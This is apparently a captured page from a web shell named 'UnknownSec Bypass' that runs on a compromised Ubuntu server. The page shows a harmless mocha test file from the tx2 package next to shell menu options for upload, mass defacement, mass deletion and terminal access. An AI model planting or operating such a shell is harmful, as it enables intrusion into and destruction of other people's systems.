UnknownSec Bypass
403
:
/
home
/
ubuntu
/
.nvm
/
versions
/
node
/
v16.13.1
/
lib
/
node_modules
/
pm2
/
node_modules
/
tx2
/
test
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
event.mocha.js
const tx2 = require('..') const should = require('should') describe('Event', function() { it('should emit an event without data', (done) => { tx2.once('data', (dt) => { should(dt.type).eql('human:event') done() }) tx2.event('something special') }) it('should emit an event with data', (done) => { tx2.once('data', (dt) => { should(dt.type).eql('human:event') should(dt.data.yes).eql(true) done() }) tx2.event('something special', { yes : true }) }) })
Copyright © 2025 - UnknownSec